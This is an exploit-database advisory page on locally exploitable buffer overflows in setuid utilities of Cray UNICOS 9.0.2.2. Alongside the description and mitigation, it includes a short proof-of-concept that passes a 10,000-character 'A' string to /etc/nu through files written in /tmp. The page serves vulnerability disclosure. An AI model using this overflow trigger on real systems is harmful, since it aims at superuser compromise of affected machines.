header-logo
Suggest Exploit
vendor:
UNICOS
by:
SecurityFocus
7.2
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: UNICOS
Affected Version From: 9.0.2.2
Affected Version To: 9.0.2.2
Patch Exists: YES
Related CWE: N/A
CPE: cray_unicos
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2005

Cray UNICOS Locally Exploitable Buffer Overflow Vulnerabilities

Cray UNICOS is prone to locally exploitable buffer overflow vulnerabilities. These issues are due to insufficient bounds checking of command line parameters in various utilities with setuid-superuser privileges. Successful exploitation could result in execution of malicious machine code with superuser privileges, facilitating the complete compromise of affected computers.

Mitigation:

Ensure that all command line parameters are properly validated and sanitized before being used.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/16205/info
 
Cray UNICOS is prone to locally exploitable buffer overflow vulnerabilities. These issues are due to insufficient bounds checking of command line parameters in various utilities with setuid-superuser privileges.
 
Successful exploitation could result in execution of malicious machine code with superuser privileges, facilitating the complete compromise of affected computers.
 
These issues are reported in version 9.0.2.2 of UNICOS; other versions may also be affected. 

for '/etc/nu':
echo "" >> /tmp/acid
udbgen -p /tmp
echo `perl -e 'print "A"x10000'` >> /tmp/script
/etc/nu -p /tmp -c /tmp/script -a

Navigation

Suggest Exploit

Services By CQR